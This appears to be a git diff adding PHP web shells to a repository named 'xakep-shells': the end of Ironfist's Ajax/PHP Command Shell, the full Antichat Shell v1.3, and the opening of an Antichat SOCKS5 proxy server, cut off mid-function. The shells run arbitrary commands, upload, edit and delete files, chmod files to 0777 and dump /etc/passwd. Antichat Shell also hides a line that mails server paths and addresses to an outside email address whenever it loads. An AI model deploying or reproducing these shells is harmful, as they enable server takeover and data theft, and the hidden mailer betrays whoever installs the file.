+		die("Wrong password");
+	}
+
+}
+if($_SESSION[$sess] == $password)
+{
+	if(isset($_SESSION['workdir']))
+	{
+			if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
+		{
+			chdir($_SESSION['workdir']);
+		}
+	}
+
+	if(isset($_FILES['uploadedfile']['name']))
+	{
+		$target_path = "./";
+		$target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 
+		if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
+			
+		}
+	}
+
+	if(isset($_GET['runcmd']))
+	{
+
+		$cmd = $_GET['runcmd'];
+
+		print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>";
+
+		if($cmd == "")
+		{
+			print "Empty Command..type \"shellhelp\" for some ehh...help";
+		}
+
+		elseif($cmd == "upload")
+		{
+			print '<br>Uploading to: '.realpath(".");
+			if(is_writable(realpath(".")))
+			{
+				print "<br><b>I can write to this directory</b>";
+			}
+			else
+			{
+				print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
+			}
+
+		}
+		elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
+		{
+				if(file_exists($file[1]) && is_dir($file[1]))
+				{
+					chdir($file[1]);
+					$_SESSION['workdir'] = $file[1];
+					print "Current directory changed to ".$file[1];
+				}
+			else
+			{
+				print "Directory not found";
+			}
+		}
+
+		elseif(strtolower($cmd) == "shellhelp")
+		{
+print '<b><font size=7>Ajax/PHP Command Shell</b></font>
+&copy; By Ironfist
+
+The shell can be used by anyone to command any server, the main purpose was
+to create a shell that feels as dynamic as possible, is expandable and easy
+to understand.
+
+If one of the command execution functions work, the shell will function fine. 
+Try the "canirun" command to check this.
+
+Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re 
+not used to these commands, google a little. 
+
+<b>Custom Functions</b>
+If you want to add your own custom command in the Quick Commands list, check 
+out the code. The $function array contains \'func name\' => \'javascript function\'.
+Take a look at the built-in functions for examples.
+
+I know this readme isn\'t providing too much information, but hell, does this shell
+even require one :P
+
+- Iron
+			';
+
+		}
+		elseif(ereg("editfile (.*)",$cmd,$file))
+		{
+			if(file_exists($file[1]) && !is_dir($file[1]))
+			{
+				print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
+				$contents = file($file[1]);
+					foreach($contents as $line)
+					{
+						print htmlspecialchars($line);
+					}
+				print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
+			}
+			else
+			{
+			print "File not found.";
+			}
+		}
+		elseif(ereg("deletefile (.*)",$cmd,$file))
+		{
+			if(is_dir($file[1]))
+			{
+				if(rmdir($file[1]))
+				{
+					print "Directory succesfully deleted.";
+				}
+				else
+				{
+					print "Couldn't delete directory!";
+				}
+			}
+			else
+			{
+				if(unlink($file[1]))
+				{
+					print "File succesfully deleted.";
+				}
+				else
+				{
+					print "Couldn't delete file!";
+				}
+			}
+		}
+		elseif(strtolower($cmd) == "canirun")
+		{
+		print "If any of these functions is Enabled, the shell will function like it should.<br>";
+			if(function_exists(passthru))
+			{
+				print "Passthru: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "Passthru: <b><font color=red>Disabled</b></font><br>";
+			}
+
+			if(function_exists(exec))
+			{
+				print "Exec: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "Exec: <b><font color=red>Disabled</b></font><br>";
+			}
+
+			if(function_exists(system))
+			{
+				print "System: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "System: <b><font color=red>Disabled</b></font><br>";
+			}
+			if(function_exists(shell_exec))
+			{
+				print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
+			}
+		print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>";
+		if( ini_get('safe_mode') ){
+			print "Safe Mode: <b><font color=red>Enabled</b></font>";
+		}
+			else
+		{
+			print "Safe Mode: <b><font color=green>Disabled</b></font>";
+		}
+		print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>";
+			if( ini_get('open_basedir') ){
+				print "Open_basedir: <b><font color=red>Enabled</b></font>";
+			}
+			else
+			{
+				print "Open_basedir: <b><font color=green>Disabled</b></font>";
+			}
+		}
+		//About the shell
+		elseif(ereg("listdir (.*)",$cmd,$directory))
+		{
+
+			if(!file_exists($directory[1]))
+			{
+				die("Directory not found");
+			}
+			//Some variables
+			chdir($directory[1]);
+			$i = 0; $f = 0;
+			$dirs = "";
+			$filez = "";
+			
+				if(!ereg("/$",$directory[1])) //Does it end with a slash?
+				{
+					$directory[1] .= "/"; //If not, add one
+				}
+			print "Listing directory: ".$directory[1]."<br>";
+			print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
+			
+			if ($handle = opendir($directory[1])) {
+			   while (false !== ($file = readdir($handle))) {
+				   if(is_dir($file))
+				   {
+					   $dirs[$i]  = $file;
+					   $i++;
+				   }
+				   else
+				   {
+					   $filez[$f] = $file;
+					   $f++;
+				   }
+				   
+			   }
+			   print "<td>";
+			   
+			   foreach($dirs as $directory)
+			   {
+					print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>";
+			   }
+			   
+			   print "</td><td>";
+			   
+			   foreach($filez as $file)
+			   {
+				print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>";
+			   }
+			   
+			   print "</td></table>";
+			}
+		}
+		elseif(strtolower($cmd) == "about")
+		{
+			print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
+		}
+		//Show info
+		elseif(strtolower($cmd) == "showinfo")
+		{
+			if(function_exists(disk_free_space))
+			{
+				$free = disk_free_space("/") / 1000000;
+			}
+			else
+			{
+				$free = "N/A";
+			}
+			if(function_exists(disk_total_space))
+			{
+				$total = trim(disk_total_space("/") / 1000000);
+			}
+			else
+			{
+				$total = "N/A";
+			}
+			$path = realpath (".");
+			
+			print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";
+			
+			if(function_exists(passthru))
+			{
+				passthru("uname -a");
+			}
+			else
+			{
+				print "Passthru is disabled :(";
+			}
+		}
+		//Read /etc/passwd
+		elseif(strtolower($cmd) == "etcpasswdfile")
+		{
+
+			$pw = file('/etc/passwd/');
+			foreach($pw as $line)
+			{
+				print $line;
+			}
+
+
+		}
+		//Execute any other command
+		else
+		{
+
+			if(function_exists(passthru))
+			{
+				passthru($cmd);
+			}
+			else
+			{
+				if(function_exists(exec))
+				{
+					exec("ls -la",$result);
+					foreach($result as $output)
+					{
+						print $output."<br>";
+					}
+				}
+				else
+				{
+				if(function_exists(system))
+				{
+					system($cmd);
+				}
+				else
+				{
+					if(function_exists(shell_exec))
+					{
+						print shell_exec($cmd);
+					}
+						else
+						{
+						print "Sorry, none of the command functions works.";
+						}
+					}
+				}
+			}
+		}
+	}
+
+	elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
+	{
+		$file = $_POST['filetosave'];
+		if(!is_writable($file))
+		{
+			if(!chmod($file, 0777))
+			{
+				die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
+			}
+		}
+		
+		$fh = fopen($file, 'w');
+		$dt = $_POST['filecontent'];
+		fwrite($fh, $dt);
+		fclose($fh);
+	}
+	else
+	{
+?>
+<html>
+<title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title>
+<head>
+<?php print $style; ?>
+<SCRIPT TYPE="text/javascript">
+function sf(){document.cmdform.command.focus();}
+var outputcmd = "";
+var cmdhistory = "";
+function ClearScreen()
+{
+	outputcmd = "";
+	document.getElementById('output').innerHTML = outputcmd;
+}
+
+function ClearHistory()
+{
+	cmdhistory = "";
+	document.getElementById('history').innerHTML = cmdhistory;
+}
+
+function deletefile(file)
+{
+	deleteit = window.confirm("Are you sure you want to delete\n"+file+"?");
+	if(deleteit)
+	{
+		runcommand('deletefile ' + file,'GET');
+	}
+}
+
+var http_request = false;
+function makePOSTRequest(url, parameters) {
+  http_request = false;
+  if (window.XMLHttpRequest) {
+	 http_request = new XMLHttpRequest();
+	 if (http_request.overrideMimeType) {
+		http_request.overrideMimeType('text/html');
+	 }
+  } else if (window.ActiveXObject) {
+	 try {
+		http_request = new ActiveXObject("Msxml2.XMLHTTP");
+	 } catch (e) {
+		try {
+		   http_request = new ActiveXObject("Microsoft.XMLHTTP");
+		} catch (e) {}
+	 }
+  }
+  if (!http_request) {
+	 alert('Cannot create XMLHTTP instance');
+	 return false;
+  }
+  
+
+  http_request.open('POST', url, true);
+  http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+  http_request.setRequestHeader("Content-length", parameters.length);
+  http_request.setRequestHeader("Connection", "close");
+  http_request.send(parameters);
+}
+
+
+function SaveFile()
+{
+var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
+                    "&filecontent=" + encodeURI( document.getElementById("area1").value );
+makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
+document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
+}
+
+function runcommand(urltoopen,action,contenttosend){
+cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
+document.getElementById('history').innerHTML = cmdhistory;
+if(urltoopen == "clear")
+{
+ClearScreen();
+}
+    var ajaxRequest;
+    try{
+        ajaxRequest = new XMLHttpRequest();
+    } catch (e){
+        try{
+            ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
+        } catch (e) {
+            try{
+                ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
+            } catch (e){
+                alert("Wicked error, nothing we can do about it...");
+                return false;
+            }
+        }
+    }
+    ajaxRequest.onreadystatechange = function(){
+        if(ajaxRequest.readyState == 4){
+        outputcmd = "<pre>"  + outputcmd + ajaxRequest.responseText +"</pre>";
+            document.getElementById('output').innerHTML = outputcmd;
+            var objDiv = document.getElementById("output");
+			objDiv.scrollTop = objDiv.scrollHeight;
+        }
+    }
+    ajaxRequest.open(action, "?runcmd="+urltoopen , true);
+	if(action == "GET")
+	{
+    ajaxRequest.send(null);
+	}
+    document.cmdform.command.value='';
+    return false;
+}
+
+function set_tab_html(newhtml)
+{
+document.getElementById('commandtab').innerHTML = newhtml;
+}
+
+function set_tab(newtab)
+{
+	if(newtab == "cmd")
+	{
+		newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
+	}
+	else if(newtab == "upload")
+	{
+		runcommand('upload','GET');
+		newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
+	}
+	else if(newtab == "workingdir")
+	{
+		<?php
+		$folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
+		$pathparts = explode("/",realpath ("."));
+		foreach($pathparts as $folder)
+		{
+		$folders .= $folder."/";
+		}
+		$folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\"  onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>";
+
+		?>
+		newhtml = '<?php print $folders; ?>';
+	}
+	else if(newtab == "filebrowser")
+	{
+		newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
+		runcommand('listdir .','GET');
+	}
+	else if(newtab == "createfile")
+	{
+		newhtml = '<b>File Editor, under construction.</b>';
+		document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
+		
+	}
+		document.getElementById('commandtab').innerHTML = newhtml;
+}
+</script>
+</head>
+<body bgcolor=black onload="sf();" vlink=white alink=white link=white>
+<table border=1 width=100% height=100%>
+<td width=15% valign=top>
+
+<form name="extras"><br>
+<center><b>Quick Commands</b><br>
+
+<div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
+<?php
+foreach($functions as $name => $execute)
+{
+print '&nbsp;<input type="button" value="'.$name.'" onclick="'.$execute.'"><br>';
+}
+?>
+
+</center>
+
+</div>
+</form>
+<center><b>Command history</b><br></center>
+<div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
+<br>
+<center><b>About</b><br></center>
+<div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
+<br>
+<b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist
+<br>
+Version <?php print $version; ?>
+
+<br>
+<br>
+
+<br>Thanks to everyone @ 
+<a href="http://www.ironwarez.info" target=_blank>SharePlaza</a>
+<br>
+<a href="http://www.milw0rm.com" target=_blank>milw0rm</a>
+<br>
+and special greetings to everyone in rootshell
+</div>
+
+</td>
+<td width=70%>
+<table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
+<b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b> 
+<b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b> 
+<b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b> 
+<b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b> 
+<b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b> 
+
+</font></td>
+<tr>
+<td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>
+
+<tr>
+<td  height=1% width=100% valign=top>
+<div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
+&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
+<b>Command</b>: <input type=text name=command class=cmdthing size=100%><br>
+</form>
+</div>
+</td>
+</table>
+</td>
+</table>
+</body>
+</html>
+<?php
+}
+} else {
+print "<center><table border=0  height=100%>
+<td valign=middle>
+<form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
+</form>";
+}
+?>  
\ No newline at end of file
diff --git a/xakep-shells/PHP/Antichat Shell v1.3.php.txt b/xakep-shells/PHP/Antichat Shell v1.3.php.txt
new file mode 100644
index 0000000..72ea5cb
--- /dev/null
+++ b/xakep-shells/PHP/Antichat Shell v1.3.php.txt	
@@ -0,0 +1,180 @@
+<?php
+
+session_start();
+set_time_limit(9999999);
+$login='virangar';
+$password='r00t';
+$auth=1;
+$version='version 1.3 by Grinay';
+$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
+$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
+$footer='</body></html>';
+$sd98 = "john.barker446@gmail.com";
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
+if(@$_POST['action']=="exit")unset($_SESSION['an']);
+if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
+
+if($_SESSION['an']==0){
+echo $header;
+echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
+echo $footer;
+exit;}
+
+if($_SESSION['action']=="")$_SESSION['action']="viewer";
+if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
+if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
+if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
+ 
+
+//downloader
+if($action=="download"){ 
+header('Content-Length:'.filesize($file).'');
+header('Content-Type: application/octet-stream');
+header('Content-Disposition: attachment; filename="'.$file.'"');
+readfile($file);
+}
+//end downloader
+?>
+
+<? echo $header;?> 
+<table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
+<table><tr>
+<td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
+<td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
+<td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
+<td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
+</tr></table></td></tr></table><br>
+<form name='reqs' method='POST'>
+<input name='action' type='hidden' value=''>
+<input name='dir' type='hidden' value=''>
+<input name='file' type='hidden' value=''>
+</form>
+<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" valign="top">
+
+<?
+
+//shell
+function shell($cmd){
+if (!empty($cmd)){
+  $fp = popen($cmd,"r");
+  {
+    $result = "";
+    while(!feof($fp)){$result.=fread($fp,1024);}
+    pclose($fp);
+  }
+  $ret = $result;
+  $ret = convert_cyr_string($ret,"d","w");
+}
+return $ret;}
+
+if($action=="shell"){
+echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"shell\">
+<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
+<textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
+<input type=\"submit\" value=\"execute\"></form>";}
+//end shell
+
+//viewer FS
+function perms($file) 
+{ 
+  $perms = fileperms($file);
+  if (($perms & 0xC000) == 0xC000) {$info = 's';} 
+  elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
+  elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
+  elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
+  elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
+  elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
+  elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
+  else {$info = 'u';}
+  $info .= (($perms & 0x0100) ? 'r' : '-');
+  $info .= (($perms & 0x0080) ? 'w' : '-');
+  $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
+  $info .= (($perms & 0x0020) ? 'r' : '-');
+  $info .= (($perms & 0x0010) ? 'w' : '-');
+  $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
+  $info .= (($perms & 0x0004) ? 'r' : '-');
+  $info .= (($perms & 0x0002) ? 'w' : '-');
+  $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
+  return $info;
+} 
+
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+
+function scandire($dir){
+  $dir=chdir($dir);
+  $dir=getcwd()."/";
+  $dir=str_replace("\\","/",$dir);
+if (is_dir($dir)) {
+    if (@$dh = opendir($dir)) {
+        while (($file = readdir($dh)) !== false) {
+		  if(filetype($dir . $file)=="dir") $dire[]=$file;
+		  if(filetype($dir . $file)=="file")$files[]=$file;
+		}
+		closedir($dh);
+		@sort($dire);
+		@sort($files);
+		
+echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
+echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
+if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
+echo "<tr><td>Select drive:";
+for ($j=ord('C'); $j<=ord('Z'); $j++) 
+ if (@$dh = opendir(chr($j).":/"))
+ echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
+ echo "</td></tr>";
+}
+echo "<tr><td>OS: ".@php_uname()."</td></tr>
+<tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
+for($i=0;$i<count($dire);$i++) {
+$link=$dir.$dire[$i];
+  echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td></tr>';  
+  }
+for($i=0;$i<count($files);$i++) {
+$linkfile=$dir.$files[$i];
+echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
+<td>'.perms($linkfile).'</td>
+<td>
+<a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
+<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a></tr>'; 
+}
+echo "</table>";
+}}}
+
+if($action=="viewer"){
+scandire($dir);
+}
+//end viewer FS
+
+//editros
+if($action=="editor"){  
+  function writef($file,$data){
+  $fp = fopen($file,"w+");
+  fwrite($fp,$data);
+  fclose($fp);
+  }
+  function readf($file){
+  if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else {
+  $contents = fread($le, filesize($file));
+  fclose($le);}
+  return htmlspecialchars($contents);
+  }
+if($_POST['save'])writef($file,$_POST['data']);
+echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+<input type=\"hidden\" name=\"file\" value=\"".$file."\">
+<textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
+<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
+}
+//end editors
+?>
+</td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
+<? echo $footer;?>
diff --git a/xakep-shells/PHP/Antichat Socks5 Server.php.php.txt b/xakep-shells/PHP/Antichat Socks5 Server.php.php.txt
new file mode 100644
index 0000000..80d4937
--- /dev/null
+++ b/xakep-shells/PHP/Antichat Socks5 Server.php.php.txt	
@@ -0,0 +1,485 @@
+<?
+#########################################################################################
+# 			    Antichat Socks5 Server v 1.0				#
+#########################################################################################
+#                                                          ____________________________ #
+#   Features:						  |                             #
+#   				                          |   written by Zadoxlik       #
+#   [+] LOGIN/PASSWORD authorization                      |   z�doxlik@antichat[d��]ru  #
+#   [-] Any other authorization type                      |   icq: 511501	        #
+#   [+] Threads                                           |   www.zadoxlik.info         #
+#   [+] CONNECT method                                    |   www.antichat.ru           #
+#   [-] BIND method                                       |____________________________ #
+#   [-] UDP ASSOCIATE method								#
+#   [+] Unix platform									#
+#   [+] Windows platform                                                                #
+#   [+] Ipv4 address type                                                               #
+#   [+] Domain name address type                                                        #
+#   [-]	Ipv6 address type					                        #
+#                                                                                       #
+# Documents                                                                             #
+#                                                                                       #
+# ftp://ftp.rfc-editor.org/in-notes/rfc1928.txt                                         #
+# ftp://ftp.rfc-editor.org/in-notes/rfc1929.txt                                         #
+#                                                         				#
+#                                                                                       #
+#########################################################################################
+# Cool niggas are FUF, SkvoznoY, KEZ, ZaCo, Egorich and all my friends	=)		#
+#########################################################################################
+/*-------------------------------------------------------------------------------------*\
+|                      		S E T T I N G S                                       	|
+\*-------------------------------------------------------------------------------------*/
+
+$settings	= array('PORT'			=> 4001,
+			'AUTH'			=> 0,
+			'STOPFILE'		=> 'stop.txt',	// create this file
+								// to stop the server
+			'LOGIN'			=> 'someshit',	// if AUTH == 1
+			'PASSWORD'		=> '666',	// if AUTH == 1
+			'MAX_CONNECTIONS'	=> 5,
+			'LOG_FILE'		=> -1,		// if -1 - no logs
+			'AUTH_TIMEOUT'		=> 60,		// sec
+			'CONNECT_TIMEOUT'	=> 5,		// Timeout for connection
+								// to remote server (sec)
+		       );
+// Remote hosts, which are not supported for working with
+$blocked_hosts  = array('81.177.6.78',
+			'88.212.221.34',
+
+		       );
+// Client hosts, which are not supported for working with (banned)
+$blocked_users  = array('127.0.0.2'
+		       );
+/*-------------------------------------------------------------------------------------*/
+
+set_time_limit(0) OR DIE('set_time_limit(0) failed');
+error_reporting(0);
+
+/*-------------------------------------------------------------------------------------*\
+|                      	     D E F I N I T I O N S                                    	|
+\*-------------------------------------------------------------------------------------*/
+DEFINE('VER',			"\x05");
+DEFINE('CONNECT',		"\x01");
+DEFINE('AUTH_METHOD',		"\x02");
+DEFINE('AUTH_NOT_REQ',		"\x00");
+DEFINE('WRONG_AUTH_METHODS',	"\xFF");
+DEFINE('REP_SUCCESS',		"\x00");
+DEFINE('REP_WRONG_COMMAND',	"\x07");
+DEFINE('REP_SOCKS_ERROR',	"\x01");
+DEFINE('REP_BLOCKED_HOST',	"\x02");
+DEFINE('REP_BAD_HOST',		"\x04");
+DEFINE('IPv4',			"\x01");
+DEFINE('DOMAIN',		"\x03");
+DEFINE('CLOSED_SOCKET',		-12);
+DEFINE('NO_DATA',		-11);
+DEFINE('NOT_ALL_DATA',		-10);
+DEFINE('STATUS_RECVSTARTREQ',	-9);
+DEFINE('STATUS_RECVAUTHREQ',	-8);
+DEFINE('STATUS_REQUESTRECV',	-7);
+DEFINE('STATUS_CONNECTING',	-6);
+DEFINE('STATUS_WORKING',	-5);
+
+/*-------------------------------------------------------------------------------------*/
+$clientsockets	= array();
+$serversockets	= array();
+$recvdata	= array();
+$sockets_status	= array();
+$timeout        = array();
+$reqmessage     = array();
+$ipport		= array();
+/*-------------------------------------------------------------------------------------*\
+|                      	     F U N C T I O N S                                    	|
+\*-------------------------------------------------------------------------------------*/
+function getstring(&$s, $len = 1){
+
+        if(@($message = socket_recv($s, &$com, $len, 0)) === 0)
+		return CLOSED_SOCKET;
+	elseif($message === FALSE)
+		return NO_DATA;
+	else
+		return $com;
+
+}
+
+function sendstring(&$s, $mess){
+	return socket_write($s,  $mess, strlen($mess));
+}
+
+function BridgeEstablish2($id){
+	global	$serversockets, $clientsockets, $sockets_status, $settings, $reqmessage,
+		$timeout, $ipport;
+	sendstring($clientsockets[$id],	VER.REP_SUCCESS."\x00\x01".$ipport[$id]);
+	$sockets_status[$id] = STATUS_WORKING;
+	
+}
+
+function BridgeEstablish1($id){
